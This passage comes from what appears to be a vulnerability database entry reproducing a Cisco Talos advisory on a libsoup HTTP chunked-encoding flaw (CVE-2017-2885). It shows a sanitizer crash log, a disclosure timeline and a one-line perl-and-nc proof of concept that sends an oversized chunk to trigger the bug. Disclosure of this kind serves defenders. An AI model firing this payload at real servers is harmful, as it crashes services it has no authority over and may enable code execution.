redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==119749==ABORTING ``` ### Exploit Proof-of-Concept ``` perl -e 'print "GET / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n\r\n1\r\n" . "A"x150 . "\r\n \r\n"' | nc ``` ### Timeline * 2017-08-02 - Vendor Disclosure * 2017-08-10 - Public Release ### CREDIT * Discovered by Aleksandar Nikolic of Cisco Talos.
idSSV:96451
last seen2017-11-19
modified2017-09-13
published2017-09-13
reporterRoot
titleGNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability(CVE-2017-2885)

Talos

idTALOS-2017-0392
last seen2019-05-29
published2017-08-10
reporterTalos Intelligence
sourcehttp://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0392
titleGNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability